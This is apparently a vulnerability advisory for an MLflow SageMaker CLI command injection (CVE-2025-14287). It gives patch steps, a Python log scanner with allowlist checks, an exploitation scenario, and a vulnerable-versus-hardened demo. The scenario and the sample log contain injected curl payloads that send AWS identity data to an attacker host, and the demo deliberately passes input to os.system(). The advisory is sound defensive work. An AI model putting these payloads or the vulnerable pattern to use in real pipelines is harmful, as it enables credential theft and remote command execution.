MLflow versions before the fix (NVD describes versions before v3.7.0 as affected; the package table below lists 3.8.0rc0 as the first patched release) expose users deploying to AWS SageMaker to OS command injection: an unsanitized container image name is interpolated into a shell command that is executed with `os.system()`. Upgrade to a fixed release immediately and audit CI/CD pipelines that accept external input for the `--container` parameter. Until patched, restrict who can invoke the MLflow SageMaker CLI commands and treat any container name that originates from an untrusted source as hostile.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| mlflow | pip | < 3.8.0rc0 | 3.8.0rc0 |
Any installation that runs the `mlflow sagemaker` CLI on a vulnerable version is exposed: the injection point is the value of its `--container` parameter, which reaches `os.system()` in `mlflow/sagemaker/__init__.py`. Installations that never deploy to SageMaker are not reached through this bug, but should still be upgraded.
Recommended Action
1. PATCH: Upgrade MLflow to a release that contains the fix (commit 8b8792a, PR #19277); this is the only full remediation. The sources cited on this page disagree on the first fixed version (the NVD text says v3.7.0, the package table and the linked release notes say 3.8.0rc0), so pin to at least the version shown in the Affected Systems table.
2. DETECT: Search CI/CD and shell logs for shell metacharacters (`;`, `|`, `$()`, backticks, `&&`) in MLflow CLI invocations, specifically in the value that follows `--container`.
3. WORKAROUND (if the patch is blocked): Validate input at the CI/CD layer and reject any container image name that does not match a strict allowlist pattern such as `^[A-Za-z0-9][A-Za-z0-9._/:@-]*$`, which admits no shell metacharacters or whitespace.
4. HARDEN: Run MLflow processes under least-privilege IAM roles and ensure no long-lived AWS credentials are present in the execution environment, so that a successful injection yields only short-lived, narrowly scoped access.
5. AUDIT: Review every pipeline configuration that passes a dynamic value to `mlflow sagemaker deploy --container` and trace the origin of each value (PR-controlled variables, environment, external triggers) to assess exposure.
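The DETECT and WORKAROUND steps above, as an added example (this is not MLflow's code; the allowlist regex, the log line format and the sample log entries are constructed assumptions). It scans CI runner output for `--container` values carrying shell metacharacters and applies a strict allowlist to the image reference:

```python
import re

# Conservative allowlist for image references: [registry/]repo[:tag][@sha256:digest].
# Deliberately stricter than Docker's reference grammar (no registry port, no
# uppercase in the repository path) and free of shell metacharacters.
# This is an assumed policy for a CI/CD input gate, not MLflow's validation.
IMAGE_REF_RE = re.compile(
    r"^[a-z0-9]+(?:[._-][a-z0-9]+)*"           # first path component / host
    r"(?:/[a-z0-9]+(?:[._-][a-z0-9]+)*)*"      # further path components
    r"(?::[A-Za-z0-9_][A-Za-z0-9_.-]{0,127})?"  # optional :tag
    r"(?:@sha256:[a-f0-9]{64})?$"              # optional @digest
)

# Characters /bin/sh treats specially. A valid image reference never contains
# them, so any occurrence after --container is a red flag.
SHELL_META_RE = re.compile(r"[;&|`$<>(){}'\"\\]")


def is_allowed_image_ref(ref):
    """Return True only for references matching the strict allowlist."""
    return IMAGE_REF_RE.fullmatch(ref) is not None


def scan_cli_log(lines):
    """Flag MLflow CLI invocations whose --container value looks hostile.

    One finding per suspicious line: the line number, the first token after
    --container, and the metacharacters seen in everything that follows it
    (an injected payload usually extends past the first token).
    """
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        line = raw.rstrip("\n")
        if "mlflow" not in line or "--container" not in line:
            continue
        rest = line.split("--container", 1)[1].lstrip(" =")
        tokens = rest.split()
        image = tokens[0] if tokens else ""
        meta = sorted(set(SHELL_META_RE.findall(rest)))
        if meta or not is_allowed_image_ref(image):
            findings.append({"line": lineno, "image": image, "metachars": meta})
    return findings


# Constructed sample of CI runner output (not real logs). The subcommand
# form follows the recommended-action text on this page.
SAMPLE_LOG = [
    "2025-12-01T10:00:01Z runner: mlflow sagemaker deploy --container ml-model:1.4.2 --region us-east-1",
    "2025-12-01T10:05:44Z runner: mlflow sagemaker deploy --container 'ml-model:1.4.2; curl -s http://198.51.100.7/$(aws sts get-caller-identity | base64)' --region us-east-1",
    "2025-12-01T10:07:12Z runner: mlflow sagemaker deploy --container ml-model:1.4.2 && id --region us-east-1",
]

if __name__ == "__main__":
    for finding in scan_cli_log(SAMPLE_LOG):
        print(finding)
```

The scan looks at everything after `--container` rather than only the first token, because a payload such as `image && curl ...` leaves the first token clean. The allowlist is intentionally narrower than what Docker accepts; widen it per registry only as far as your pipelines actually need.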
Technical Details
NVD Description
A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.
Exploitation Scenario
An adversary with write access to a Git repository (via compromised developer credentials or a malicious PR) modifies the CI/CD pipeline configuration so that the container image name passed to the MLflow SageMaker deployment command is a crafted string such as `legitimate-image:latest; curl -s http://attacker.com/$(aws sts get-caller-identity | base64)`. When the pipeline runs, MLflow interpolates the unsanitized string into an `os.system()` call; `/bin/sh` treats `;` as a command separator and `$(...)` as a command substitution, so the injected `curl` executes with the CI runner's privileges and AWS credentials. The attacker's server receives the runner's AWS identity (account and principal ARN), confirming which credentials the runner holds; the same foothold lets the attacker run further commands with those credentials to read S3 model buckets, enumerate SageMaker endpoints, and exfiltrate or replace production model artifacts. No user interaction beyond a normal pipeline run is required.
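The bug class the NVD description and the scenario above describe, reconstructed as an added example. This is not MLflow's own code: a harmless `echo` stands in for the command the tool runs, and the payload, paths and function names are assumptions. The vulnerable path hands one interpolated string to `os.system()`; the hardened path passes an argv list with no shell and additionally rejects names that would parse as options:

```python
import os
import subprocess
import tempfile


def vulnerable_deploy(image, workdir):
    """Pre-fix pattern: the image name is interpolated into one shell string.

    /bin/sh parses the whole string, so ';', '&&', '|' and '$(...)' inside
    `image` become command separators and substitutions. Returns True if the
    injected command ran (it leaves a marker file).
    """
    os.system(f"echo deploying {image} > {workdir}/deploy.log")
    return os.path.exists(os.path.join(workdir, "pwned"))


def hardened_deploy(image, workdir):
    """Post-fix pattern: argv list, no shell, plus an option-injection check.

    With shell=False (subprocess's default) the image name reaches the
    program as a single argument, whatever characters it contains. The
    leading-dash check closes the remaining hole: a value like '--privileged'
    is not a shell injection but would still be parsed as an option by the
    called program.
    """
    if not image or image.startswith("-"):
        raise ValueError(f"refusing image name that looks like an option: {image!r}")
    with open(os.path.join(workdir, "deploy.log"), "w") as log:
        subprocess.run(["echo", "deploying", image], stdout=log, check=True)
    return os.path.exists(os.path.join(workdir, "pwned"))


def demo():
    """Run the same payload through both paths; True means the injection succeeded."""
    results = {}
    for name, deploy in (("vulnerable", vulnerable_deploy), ("hardened", hardened_deploy)):
        workdir = tempfile.mkdtemp(prefix="mlflow-ci-")
        # Constructed payload modelled on the scenario: a plausible image name
        # followed by a second command. `touch` plays the role of the exfil step.
        payload = f"ml-model:1.4.2; touch {workdir}/pwned"
        results[name] = deploy(payload, workdir)
    return results


if __name__ == "__main__":
    print(demo())
```

Under the vulnerable path the marker file appears because `touch` ran as a separate command; under the hardened path `deploy.log` contains the literal text `deploying ml-model:1.4.2; touch ...` and no marker exists. Moving off the shell is the fix for this CVE; the allowlist check from the recommended actions remains worthwhile because the called program still interprets its own arguments.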
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
References
- github.com/advisories/GHSA-xch3-2f9x-wh9f
- github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
- github.com/mlflow/mlflow/pull/19277
- github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- nvd.nist.gov/vuln/detail/CVE-2025-14287